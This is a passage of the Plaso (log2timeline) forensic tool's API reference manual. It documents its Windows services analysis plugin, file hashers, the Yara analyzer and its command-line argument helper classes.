52 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Type str service_type value of the Type value of the service key. Type int source tuple containing the path and registry key describing where the service was found Type tuple[str, str] start_type value of the Start value of the service key. Type int COMPARE_EXCLUDE = frozenset({'sources'}) classmethod FromEventData(event_data, event_data_stream) Creates a service object from event data. Parameters • event_data (EventData) – event data. • event_data_stream (EventDataStream) – event data stream. Returns service. Return type WindowsService HumanReadableStartType() Return a human readable string describing the start type value. Returns human readable description of the start type value. Return type str HumanReadableType() Return a human readable string describing the type value. Returns human readable description of the type value. Return type str __eq__(other_service) Custom equality method so that we match near-duplicates. Compares two service objects together and evaluates if they are the same or close enough to be considered to represent the same service. For two service objects to be considered the same they need to have the the same set of attributes and same values for all their attributes, other than those enumerated as reserved in the COMPARE_EXCLUDE constant. Parameters other_service (WindowsService) – service we are testing for equality. Returns whether the services are equal. Return type bool yaml_tag = '!WindowsService' class plaso.analysis.windows_services.WindowsServiceCollection Bases: object Class to hold and de-duplicate Windows Services.

5.1. Subpackages 53 Plaso (log2timeline), Release 20210606

AddService(new_service) Add a new service to the list of ones we know about. Parameters new_service (WindowsService) – the service to add. property services services in this collection. Type list[WindowsService] class plaso.analysis.windows_services.WindowsServicesAnalysisPlugin Bases: plaso.analysis.interface.AnalysisPlugin Provides a single list of for Windows services found in the Registry. CompileReport(mediator) Compiles an analysis report. Parameters mediator (AnalysisMediator) – mediates interactions between analysis plugins and other components, such as storage and dfvfs. Returns report. Return type AnalysisReport ExamineEvent(mediator, event, event_data, event_data_stream) Analyzes an event and creates Windows Services as required. At present, this method only handles events extracted from the Registry. Parameters • mediator (AnalysisMediator) – mediates interactions between analysis plugins and other components, such as storage and dfvfs. • event (EventObject) – event to examine. • event_data (EventData) – event data. • event_data_stream (EventDataStream) – event data stream. NAME = 'windows_services' SetOutputFormat(output_format) Sets the output format of the generated report. Parameters output_format (str) – format the plugin should used to produce its output.

Module contents

This file imports Python modules that register analysis plugins.

5.1.2 plaso.analyzers package

Subpackages

plaso.analyzers.hashers package

Submodules

54 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

plaso.analyzers.hashers.entropy module

The entropy calculation implementation. class plaso.analyzers.hashers.entropy.EntropyHasher Bases: plaso.analyzers.hashers.interface.BaseHasher Calculates the byte entropy of input files. ATTRIBUTE_NAME = 'file_entropy' DESCRIPTION = 'Calculates the byte entropy of input data.' GetStringDigest() Calculates the byte entropy value. Byte entropy is a value between 0.0 and 8.0, and is returned as a string to match the Plaso analyzer and storage APIs. Returns byte entropy formatted as a floating point number with 6 decimal places calculated over the data blocks passed to Update(). Return type str NAME = 'entropy' Update(data) Updates the state of the entropy calculator with a new block of data. Repeated calls to update are equivalent to one single call with the concatenation of the arguments. Parameters data (bytes) – block of data with which to update the context of the entropy calculator. plaso.analyzers.hashers.interface module

The hasher interface. class plaso.analyzers.hashers.interface.BaseHasher Bases: object Base class for objects that calculate hashes. ATTRIBUTE_NAME = 'hash' DESCRIPTION = 'Calculates a digest hash over input data.' abstract GetStringDigest() Retrieves the digest of the hash function expressed as a Unicode string. Returns string hash digest calculated over the data blocks passed to Update(). The string consists of printable Unicode characters. Return type str NAME = 'base_hasher' abstract Update(data) Updates the current state of the hasher with a new block of data. Repeated calls to update are equivalent to one single call with the concatenation of the arguments.

5.1. Subpackages 55 Plaso (log2timeline), Release 20210606

Parameters data (bytes) – data with which to update the context of the hasher. plaso.analyzers.hashers.manager module

This file contains a class for managing digest hashers for Plaso. class plaso.analyzers.hashers.manager.HashersManager Bases: object Class that implements the hashers manager. classmethod DeregisterHasher(hasher_class) Deregisters a hasher class. The hasher classes are identified based on their lower case name. Parameters hasher_class (type) – class object of the hasher. Raises KeyError – if hasher class is not set for the corresponding name. classmethod GetHasher(hasher_name) Retrieves an instance of a specific hasher. Parameters hasher_name (str) – the name of the hasher to retrieve. Returns hasher. Return type BaseHasher Raises KeyError – if hasher class is not set for the corresponding name. classmethod GetHasherClasses(hasher_names=None) Retrieves the registered hashers. Parameters hasher_names (list[str]) – names of the hashers to retrieve. Yields tuple – containing: str: parser name type: next hasher class. classmethod GetHasherNames() Retrieves the names of all loaded hashers. Returns hasher names. Return type list[str] classmethod GetHasherNamesFromString(hasher_names_string) Retrieves a list of a hasher names from a comma separated string. Takes a string of comma separated hasher names transforms it to a list of hasher names. Parameters hasher_names_string (str) – comma separated names of hashers to enable, the string ‘all’ to enable all hashers or ‘none’ to disable all hashers. Returns names of valid hashers from the string, or an empty list if no valid names are found. Return type list[str] classmethod GetHashers(hasher_names) Retrieves instances for all the specified hashers.

56 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Parameters hasher_names (list[str]) – names of the hashers to retrieve. Returns hashers. Return type list[BaseHasher] classmethod GetHashersInformation() Retrieves the hashers information. Returns containing: str: hasher name. str: hasher description. Return type list[tuple] classmethod RegisterHasher(hasher_class) Registers a hasher class. The hasher classes are identified based on their lower case name. Parameters hasher_class (type) – class object of the hasher. Raises KeyError – if hasher class is already set for the corresponding name. plaso.analyzers.hashers.md5 module

The MD5 hasher implementation. class plaso.analyzers.hashers.md5.MD5Hasher Bases: plaso.analyzers.hashers.interface.BaseHasher This class provides MD5 hashing functionality. ATTRIBUTE_NAME = 'md5_hash' DESCRIPTION = 'Calculates an MD5 digest hash over input data.' GetStringDigest() Returns the digest of the hash function expressed as a Unicode string. Returns string hash digest calculated over the data blocks passed to Update(). The string consists of printable Unicode characters. Return type str NAME = 'md5' Update(data) Updates the current state of the hasher with a new block of data. Repeated calls to update are equivalent to one single call with the concatenation of the arguments. Parameters data (bytes) – block of data with which to update the context of the hasher.

5.1. Subpackages 57 Plaso (log2timeline), Release 20210606

plaso.analyzers.hashers.sha1 module

The SHA-1 Hasher implementation class plaso.analyzers.hashers.sha1.SHA1Hasher Bases: plaso.analyzers.hashers.interface.BaseHasher This class provides SHA-1 hashing functionality. ATTRIBUTE_NAME = 'sha1_hash' DESCRIPTION = 'Calculates a SHA-1 digest hash over input data.' GetStringDigest() Returns the digest of the hash function expressed as a Unicode string. Returns string hash digest calculated over the data blocks passed to Update(). The string consists of printable Unicode characters. Return type str NAME = 'sha1' Update(data) Updates the current state of the hasher with a new block of data. Repeated calls to update are equivalent to one single call with the concatenation of the arguments. Parameters data (bytes) – block of data with which to update the context of the hasher. plaso.analyzers.hashers.sha256 module

The SHA-256 Hasher implementation class plaso.analyzers.hashers.sha256.SHA256Hasher Bases: plaso.analyzers.hashers.interface.BaseHasher This class provides SHA-256 hashing functionality. ATTRIBUTE_NAME = 'sha256_hash' DESCRIPTION = 'Calculates a SHA-256 digest hash over input data.' GetStringDigest() Returns the digest of the hash function expressed as a Unicode string. Returns string hash digest calculated over the data blocks passed to Update(). The string consists of printable Unicode characters. Return type str NAME = 'sha256' Update(data) Updates the current state of the hasher with a new block of data. Repeated calls to update are equivalent to one single call with the concatenation of the arguments. Parameters data (bytes) – block of data with which to update the context of the hasher.

58 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Module contents

This file imports Python modules that register hashers.

Submodules plaso.analyzers.hashing_analyzer module

The hashing analyzer implementation. class plaso.analyzers.hashing_analyzer.HashingAnalyzer Bases: plaso.analyzers.interface.BaseAnalyzer This class contains code for calculating file hashes of input files. In Plaso, hashers are classes that map arbitrarily sized file content to a fixed size value. See: https://en.wikipedia. org/wiki/Hash_function Analyze(data) Updates the internal state of the analyzer, processing a block of data. Repeated calls are equivalent to a single call with the concatenation of all the arguments. Parameters data (bytes) – block of data from the data stream. DESCRIPTION = 'Calculates hashes of file content.' GetResults() Retrieves the hashing results. Returns results. Return type list[AnalyzerResult] INCREMENTAL_ANALYZER = True NAME = 'hashing' PROCESSING_STATUS_HINT = 'hashing' Reset() Resets the internal state of the analyzer. SetHasherNames(hasher_names_string) Sets the hashers that should be enabled. Parameters hasher_names_string (str) – comma separated names of hashers to enable. plaso.analyzers.interface module

Definitions to provide a whole-file processing framework. class plaso.analyzers.interface.BaseAnalyzer Bases: object Class that provides the interface for whole-file analysis. abstract Analyze(data) Analyzes a block of data, updating the state of the analyzer Parameters data (bytes) – block of data to process. DESCRIPTION = ''

5.1. Subpackages 59 Plaso (log2timeline), Release 20210606

abstract GetResults() Retrieves the results of the analysis. Returns results. Return type list[AnalyzerResult] INCREMENTAL_ANALYZER = False NAME = 'base_analyzer' PROCESSING_STATUS_HINT = 'analyzing' abstract Reset() Resets the internal state of the analyzer. SIZE_LIMIT = 33554432 plaso.analyzers.logger module

The analyzers sub module logger. plaso.analyzers.manager module

This file contains a class for managing digest analyzers for Plaso. class plaso.analyzers.manager.AnalyzersManager Bases: object Class that implements the analyzers manager. classmethod DeregisterAnalyzer(analyzer_class) Deregisters a analyzer class. The analyzer classes are identified based on their lower case name. Parameters analyzer_class (type) – class object of the analyzer. Raises KeyError – if analyzer class is not set for the corresponding name. classmethod GetAnalyzerInstance(analyzer_name) Retrieves an instance of a specific analyzer. Parameters analyzer_name (str) – name of the analyzer to retrieve. Returns analyzer instance. Return type BaseAnalyzer Raises KeyError – if analyzer class is not set for the corresponding name. classmethod GetAnalyzerInstances(analyzer_names) Retrieves instances for all the specified analyzers. Parameters analyzer_names (list[str]) – names of the analyzers to retrieve. Returns analyzer instances. Return type list[BaseAnalyzer] classmethod GetAnalyzerNames() Retrieves the names of all loaded analyzers. Returns of analyzer names.

60 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Return type list[str] classmethod GetAnalyzers() Retrieves the registered analyzers. Yields tuple – containing: str: the uniquely identifying name of the analyzer type: the analyzer class. classmethod GetAnalyzersInformation() Retrieves the analyzers information. Returns containing: str: analyzer name. str: analyzer description. Return type list[tuple] classmethod RegisterAnalyzer(analyzer_class) Registers a analyzer class. The analyzer classes are identified by their lower case name. Parameters analyzer_class (type) – the analyzer class to register. Raises KeyError – if analyzer class is already set for the corresponding name. plaso.analyzers.yara_analyzer module

Analyzer that matches Yara rules. class plaso.analyzers.yara_analyzer.YaraAnalyzer Bases: plaso.analyzers.interface.BaseAnalyzer Analyzer that matches Yara rules. Analyze(data) Analyzes a block of data, attempting to match Yara rules to it. Parameters data (bytes) – a block of data. DESCRIPTION = 'Matches Yara rules over input data.' GetResults() Retrieves results of the most recent analysis. Returns results. Return type list[AnalyzerResult] INCREMENTAL_ANALYZER = False NAME = 'yara' PROCESSING_STATUS_HINT = 'yara scan' Reset() Resets the internal state of the analyzer. SetRules(rules_string) Sets the rules that the Yara analyzer will use. Parameters rules_string (str) – Yara rule definitions

5.1. Subpackages 61 Plaso (log2timeline), Release 20210606

Module contents

This file imports Python modules that register analyzers.

5.1.3 plaso.cli package

Subpackages plaso.cli.helpers package

Submodules plaso.cli.helpers.analysis_plugins module

The analysis plugins CLI arguments helper. class plaso.cli.helpers.analysis_plugins.AnalysisPluginsArgumentsHelper Bases: plaso.cli.helpers.interface.ArgumentsHelper Analysis plugins CLI arguments helper. classmethod AddArguments(argument_group) Adds command line arguments to an argument group. This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports. Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group. DESCRIPTION = 'Analysis plugins command line arguments.' NAME = 'analysis_plugins' classmethod ParseOptions(options, configuration_object) Parses and validates options. Parameters • options (argparse.Namespace) – parser options. • configuration_object (CLITool) – object to be configured by the argument helper. Raises • BadConfigObject – when the configuration object is of the wrong type. • BadConfigOption – when non-existing analysis plugins are specified.

62 Chapter 5. plaso package Plaso (log2timeline), Release 20210606 plaso.cli.helpers.artifact_definitions module

The artifact definitions CLI arguments helper. class plaso.cli.helpers.artifact_definitions.ArtifactDefinitionsArgumentsHelper Bases: plaso.cli.helpers.interface.ArgumentsHelper Artifact definition CLI arguments helper. classmethod AddArguments(argument_group) Adds command line arguments to an argument group. This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports. Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group. DESCRIPTION = 'Artifact definition command line arguments.' NAME = 'artifact_definitions' classmethod ParseOptions(options, configuration_object) Parses and validates options. Parameters • options (argparse.Namespace) – parser options. • configuration_object (CLITool) – object to be configured by the argument helper. Raises • BadConfigObject – when the configuration object is of the wrong type. • BadConfigOption – if the required artifact definitions are not defined. plaso.cli.helpers.artifact_filters module

The artifacts filter file CLI arguments helper. class plaso.cli.helpers.artifact_filters.ArtifactFiltersArgumentsHelper Bases: plaso.cli.helpers.interface.ArgumentsHelper Artifacts filter file CLI arguments helper. classmethod AddArguments(argument_group) Adds command line arguments to an argument group. This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports. Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group. DESCRIPTION = 'Artifact filters command line arguments.' NAME = 'artifact_filters' classmethod ParseOptions(options, configuration_object) Parses and validates options. Parameters • options (argparse.Namespace) – parser options.

5.1. Subpackages 63 Plaso (log2timeline), Release 20210606

• configuration_object (CLITool) – object to be configured by the argument helper. Raises • BadConfigObject – when the configuration object is of the wrong type. • BadConfigOption – if the required artifact definitions are not defined. plaso.cli.helpers.data_location module

The data location CLI arguments helper. class plaso.cli.helpers.data_location.DataLocationArgumentsHelper Bases: plaso.cli.helpers.interface.ArgumentsHelper Data location CLI arguments helper. classmethod AddArguments(argument_group) Adds command line arguments to an argument group. This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports. Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group. DESCRIPTION = 'Data location command line arguments.' NAME = 'data_location' classmethod ParseOptions(options, configuration_object) Parses and validates options. Parameters • options (argparse.Namespace) – parser options. • configuration_object (CLITool) – object to be configured by the argument helper. Raises • BadConfigObject – when the configuration object is of the wrong type. • BadConfigOption – when the location of the data files cannot be determined.

plaso.cli.helpers.date_filters module

The date filters CLI arguments helper. class plaso.cli.helpers.date_filters.DateFiltersArgumentsHelper Bases: plaso.cli.helpers.interface.ArgumentsHelper Date filters CLI arguments helper. classmethod AddArguments(argument_group) Adds command line arguments to an argument group. This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports. Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.

64 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

DESCRIPTION = 'Date filters command line arguments.' NAME = 'date_filters' classmethod ParseOptions(options, configuration_object) Parses and validates options. Parameters • options (argparse.Namespace) – parser options. • configuration_object (CLITool) – object to be configured by the argument helper. Raises • BadConfigObject – when the configuration object is of the wrong type. • BadConfigOption – when the date filter is badly formatted. plaso.cli.helpers.dynamic_output module

The dynamic output module CLI arguments helper. class plaso.cli.helpers.dynamic_output.DynamicOutputArgumentsHelper Bases: plaso.cli.helpers.interface.ArgumentsHelper Dynamic output module CLI arguments helper. classmethod AddArguments(argument_group) Adds command line arguments the helper supports to an argument group. This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports. Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group. CATEGORY = 'output' DESCRIPTION = 'Argument helper for the dynamic output module.' NAME = 'dynamic' classmethod ParseOptions(options, output_module) Parses and validates options. Parameters • options (argparse.Namespace) – parser options. • output_module (OutputModule) – output module to configure. Raises • BadConfigObject – when the output module object is of the wrong type. • BadConfigOption – when the output filename was not provided.

5.1. Subpackages 65 Plaso (log2timeline), Release 20210606 plaso.cli.helpers.elastic_output module

The Elastic Search output module CLI arguments helper. class plaso.cli.helpers.elastic_output.ElasticSearchOutputArgumentsHelper Bases: plaso.cli.helpers.interface.ArgumentsHelper Elastic Search output module CLI arguments helper. classmethod AddArguments(argument_group) Adds command line arguments the helper supports to an argument group. This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports. Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group. CATEGORY = 'output' DESCRIPTION = 'Argument helper for the Elastic Search output modules.' NAME = 'elastic' classmethod ParseOptions(options, output_module) Parses and validates options. Parameters • options (argparse.Namespace) – parser options. • output_module (OutputModule) – output module to configure. Raises • BadConfigObject – when the output module object is of the wrong type. • BadConfigOption – when a configuration parameter fails validation. plaso.cli.helpers.elastic_ts_output module

The Elastic Timesketch output module CLI arguments helper. class plaso.cli.helpers.elastic_ts_output.ElasticTimesketchOutputArgumentsHelper Bases: plaso.cli.helpers.interface.ArgumentsHelper Elastic Timesketch output module CLI arguments helper. classmethod AddArguments(argument_group) Adds command line arguments the helper supports to an argument group. This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports. Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group. CATEGORY = 'output' DESCRIPTION = 'Argument helper for the Elastic Timesketch output module.' NAME = 'elastic_ts' classmethod ParseOptions(options, output_module) Parses and validates options.

66 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Parameters • options (argparse.Namespace) – parser options. • output_module (OutputModule) – output module to configure. Raises • BadConfigObject – when the output module object is of the wrong type. • BadConfigOption – when a configuration parameter fails validation. plaso.cli.helpers.event_filters module

The event filters CLI arguments helper. class plaso.cli.helpers.event_filters.EventFiltersArgumentsHelper Bases: plaso.cli.helpers.interface.ArgumentsHelper Event filters CLI arguments helper. classmethod AddArguments(argument_group) Adds command line arguments to an argument group. This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports. Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group. DESCRIPTION = 'Event filters command line arguments.' NAME = 'event_filters' classmethod ParseOptions(options, configuration_object) Parses and validates options. Parameters • options (argparse.Namespace) – parser options. • configuration_object (CLITool) – object to be configured by the argument helper. Raises • BadConfigObject – when the configuration object is of the wrong type. • BadConfigOption – when a configuration parameter fails validation.

plaso.cli.helpers.extraction module

The extraction CLI arguments helper. class plaso.cli.helpers.extraction.ExtractionArgumentsHelper Bases: plaso.cli.helpers.interface.ArgumentsHelper Extraction CLI arguments helper. classmethod AddArguments(argument_group) Adds command line arguments to an argument group. This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.

5.1. Subpackages 67 Plaso (log2timeline), Release 20210606

Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group. DESCRIPTION = 'Extraction command line arguments.' NAME = 'extraction' classmethod ParseOptions(options, configuration_object) Parses and validates options. Parameters • options (argparse.Namespace) – parser options. • configuration_object (CLITool) – object to be configured by the argument helper. Raises BadConfigObject – when the configuration object is of the wrong type. plaso.cli.helpers.filter_file module

The filter file CLI arguments helper. class plaso.cli.helpers.filter_file.FilterFileArgumentsHelper Bases: plaso.cli.helpers.interface.ArgumentsHelper Filter file CLI arguments helper. classmethod AddArguments(argument_group) Adds command line arguments to an argument group. This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports. Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group. DESCRIPTION = 'Filter file command line arguments.' NAME = 'filter_file' classmethod ParseOptions(options, configuration_object) Parses and validates options. Parameters • options (argparse.Namespace) – parser options. • configuration_object (CLITool) – object to be configured by the argument helper. Raises • BadConfigObject – when the configuration object is of the wrong type. • BadConfigOption – if the collection file does not exist.

68 Chapter 5. plaso package Plaso (log2timeline), Release 20210606 plaso.cli.helpers.hashers module

The hashers CLI arguments helper. class plaso.cli.helpers.hashers.HashersArgumentsHelper Bases: plaso.cli.helpers.interface.ArgumentsHelper Hashers CLI arguments helper. classmethod AddArguments(argument_group) Adds command line arguments to an argument group. This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports. Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group. DESCRIPTION = 'Hashers command line arguments.' NAME = 'hashers' classmethod ParseOptions(options, configuration_object) Parses and validates options. Parameters • options (argparse.Namespace) – parser options. • configuration_object (CLITool) – object to be configured by the argument helper. Raises • BadConfigObject – when the configuration object is of the wrong type. • BadConfigOption – when a configuration parameter fails validation. plaso.cli.helpers.interface module

The arguments helper interface. class plaso.cli.helpers.interface.ArgumentsHelper Bases: object CLI arguments helper. classmethod AddArguments(argument_group) Adds command line arguments to an argument group. This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports. Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group. CATEGORY = '' DESCRIPTION = '' NAME = 'baseline' classmethod ParseOptions(options, configuration_object) Parses and validates options. Parameters

5.1. Subpackages 69 Plaso (log2timeline), Release 20210606

• options (argparse.Namespace) – parser options. • configuration_object (object) – object to be configured by the argument helper. Raises • BadConfigObject – when the configuration object is of the wrong type. • BadConfigOption – when a configuration parameter fails validation. plaso.cli.helpers.language module

The language CLI arguments helper. class plaso.cli.helpers.language.LanguageArgumentsHelper Bases: plaso.cli.helpers.interface.ArgumentsHelper Language CLI arguments helper. classmethod AddArguments(argument_group) Adds command line arguments to an argument group. This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports. Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group. DESCRIPTION = 'Language command line arguments.' NAME = 'language' classmethod ParseOptions(options, configuration_object) Parses and validates options. Parameters • options (argparse.Namespace) – parser options. • configuration_object (CLITool) – object to be configured by the argument helper. Raises BadConfigObject – when the configuration object is of the wrong type. plaso.cli.helpers.manager module

The CLI arguments helper manager objects. class plaso.cli.helpers.manager.ArgumentHelperManager Bases: object Class that implements the CLI argument helper manager. classmethod AddCommandLineArguments(argument_group, category=None, names=None) Adds command line arguments to a configuration object. Parameters • argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group. • category (Optional[str]) – category of helpers to apply to the group, such as storage, output, where None will apply the arguments to all helpers. The category can be used to add arguments to a specific group of registered helpers.

70 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

• names (Optional[list[str]]) – names of argument helpers to apply, where None will apply the arguments to all helpers. classmethod DeregisterHelper(helper_class) Deregisters a helper class. The helper classes are identified based on their lower case name. Parameters helper_class (type) – class object of the argument helper. Raises KeyError – if helper class is not set for the corresponding name. classmethod ParseOptions(options, config_object, category=None, names=None) Parses and validates arguments using the appropriate helpers. Parameters • options (argparse.Namespace) – parser options. • config_object (object) – object to be configured by an argument helper. • category (Optional[str]) – category of helpers to apply to the group, such as storage, output, where None will apply the arguments to all helpers. The category can be used to add arguments to a specific group of registered helpers. • names (Optional[list[str]]) – names of argument helpers to apply, where None will apply the arguments to all helpers. classmethod RegisterHelper(helper_class) Registers a helper class. The helper classes are identified based on their lower case name. Parameters helper_class (type) – class object of the argument helper. Raises KeyError – if helper class is already set for the corresponding name. classmethod RegisterHelpers(helper_classes) Registers helper classes. The helper classes are identified based on their lower case name. Parameters helper_classes (list[type]) – class objects of the argument helpers. Raises KeyError – if helper class is already set for the corresponding name. plaso.cli.helpers.nsrlsvr_analysis module

The nsrlsvr analysis plugin CLI arguments helper. class plaso.cli.helpers.nsrlsvr_analysis.NsrlsvrAnalysisArgumentsHelper Bases: plaso.cli.helpers.interface.ArgumentsHelper Nsrlsvr analysis plugin CLI arguments helper. classmethod AddArguments(argument_group) Adds command line arguments the helper supports to an argument group. This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports. Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – group to append arguments to. CATEGORY = 'analysis'

5.1. Subpackages 71 Plaso (log2timeline), Release 20210606

DESCRIPTION = 'Argument helper for the nsrlsvr analysis plugin.' NAME = 'nsrlsvr' classmethod ParseOptions(options, analysis_plugin) Parses and validates options. Parameters • options (argparse.Namespace) – parser options object. • analysis_plugin (NsrlsvrAnalysisPlugin) – analysis plugin to configure. Raises • BadConfigObject – when the analysis plugin is the wrong type. • BadConfigOption – when unable to connect to nsrlsvr instance. plaso.cli.helpers.output_modules module

The output modules CLI arguments helper. class plaso.cli.helpers.output_modules.OutputModulesArgumentsHelper Bases: plaso.cli.helpers.interface.ArgumentsHelper Output modules CLI arguments helper. classmethod AddArguments(argument_group) Adds command line arguments to an argument group. This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports. Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group. DESCRIPTION = 'Output modules command line arguments.' NAME = 'output_modules' classmethod ParseOptions(options, configuration_object) Parses and validates options. Parameters • options (argparse.Namespace) – parser options. • configuration_object (CLITool) – object to be configured by the argument helper. Raises • BadConfigObject – when the configuration object is of the wrong type. • BadConfigOption – when the output format is not supported or the output is not provided or already exists.

72 Chapter 5. plaso package Plaso (log2timeline), Release 20210606 plaso.cli.helpers.parsers module

The parsers CLI arguments helper. class plaso.cli.helpers.parsers.ParsersArgumentsHelper Bases: plaso.cli.helpers.interface.ArgumentsHelper Parsers CLI arguments helper. classmethod AddArguments(argument_group) Adds command line arguments to an argument group. This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports. Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group. DESCRIPTION = 'Parsers command line arguments.' NAME = 'parsers' classmethod ParseOptions(options, configuration_object) Parses and validates options. Parameters • options (argparse.Namespace) – parser options. • configuration_object (CLITool) – object to be configured by the argument helper. Raises BadConfigObject – when the configuration object is of the wrong type. plaso.cli.helpers.process_resources module

The process resources CLI arguments helper. class plaso.cli.helpers.process_resources.ProcessResourcesArgumentsHelper Bases: plaso.cli.helpers.interface.ArgumentsHelper Process resources CLI arguments helper. classmethod AddArguments(argument_group) Adds command line arguments to an argument group. This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports. Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group. DESCRIPTION = 'Process resources command line arguments.' NAME = 'process_resources' classmethod ParseOptions(options, configuration_object) Parses and validates options. Parameters • options (argparse.Namespace) – parser options. • configuration_object (CLITool) – object to be configured by the argument helper. Raises

5.1. Subpackages 73 Plaso (log2timeline), Release 20210606

• BadConfigObject – when the configuration object is of the wrong type. • BadConfigOption – when a configuration parameter fails validation. plaso.cli.helpers.profiling module

The profiling CLI arguments helper. class plaso.cli.helpers.profiling.ProfilingArgumentsHelper Bases: plaso.cli.helpers.interface.ArgumentsHelper Profiling CLI arguments helper. classmethod AddArguments(argument_group) Adds command line arguments to an argument group. This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports. Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group. DEFAULT_PROFILING_SAMPLE_RATE = 1000 DESCRIPTION = 'Profiling command line arguments.' NAME = 'profiling' PROFILERS_INFORMATION = {'analyzers': 'Profile CPU time of analyzers, like hashing', 'memory': 'Profile memory usage over time', 'parsers': 'Profile CPU time per parser', 'processing': 'Profile CPU time of processing phases', 'serializers': 'Profile CPU time of serialization', 'storage': 'Profile storage reads and writes', 'task_queue': 'Profile task queue status (multi-processing only)', 'tasks': 'Profile the status of tasks (multi-processing only)'} classmethod ParseOptions(options, configuration_object) Parses and validates options. Parameters • options (argparse.Namespace) – parser options. • configuration_object (CLITool) – object to be configured by the argument helper. Raises • BadConfigObject – when the configuration object is of the wrong type. • BadConfigOption – when the configuration options are missing or not supported.

plaso.cli.helpers.sessionize_analysis module

The sessionize analysis plugin CLI arguments helper. class plaso.cli.helpers.sessionize_analysis.SessionizeAnalysisArgumentsHelper Bases: plaso.cli.helpers.interface.ArgumentsHelper Sessionize analysis plugin CLI arguments helper. classmethod AddArguments(argument_group) Adds command line arguments the helper supports to an argument group.

74 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports. Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group. CATEGORY = 'analysis' DESCRIPTION = 'Argument helper for the Sessionize analysis plugin.' NAME = 'sessionize' classmethod ParseOptions(options, analysis_plugin) Parses and validates options. Parameters • options (argparse.Namespace) – parser options. • analysis_plugin (OutputModule) – analysis_plugin to configure. Raises • BadConfigObject – when the output module object is of the wrong type. • BadConfigOption – when a configuration parameter fails validation. plaso.cli.helpers.status_view module

The status view CLI arguments helper. class plaso.cli.helpers.status_view.StatusViewArgumentsHelper Bases: plaso.cli.helpers.interface.ArgumentsHelper Status view CLI arguments helper. classmethod AddArguments(argument_group) Adds command line arguments to an argument group. This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports. Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group. DESCRIPTION = 'Status view command line arguments.' NAME = 'status_view' classmethod ParseOptions(options, configuration_object) Parses and validates options. Parameters • options (argparse.Namespace) – parser options. • configuration_object (CLITool) – object to be configured by the argument helper. Raises BadConfigObject – when the configuration object is of the wrong type.

5.1. Subpackages 75 Plaso (log2timeline), Release 20210606 plaso.cli.helpers.storage_format module

The storage format CLI arguments helper. class plaso.cli.helpers.storage_format.StorageFormatArgumentsHelper Bases: plaso.cli.helpers.interface.ArgumentsHelper Storage format CLI arguments helper. classmethod AddArguments(argument_group) Adds command line arguments to an argument group. This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports. Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group. DESCRIPTION = 'Storage format command line arguments.' NAME = 'storage_format' classmethod ParseOptions(options, configuration_object) Parses and validates options. Parameters • options (argparse.Namespace) – parser options. • configuration_object (CLITool) – object to be configured by the argument helper. Raises • BadConfigObject – when the configuration object is of the wrong type. • BadConfigOption – if the storage format or task storage is not defined or supported. plaso.cli.helpers.tagging_analysis module

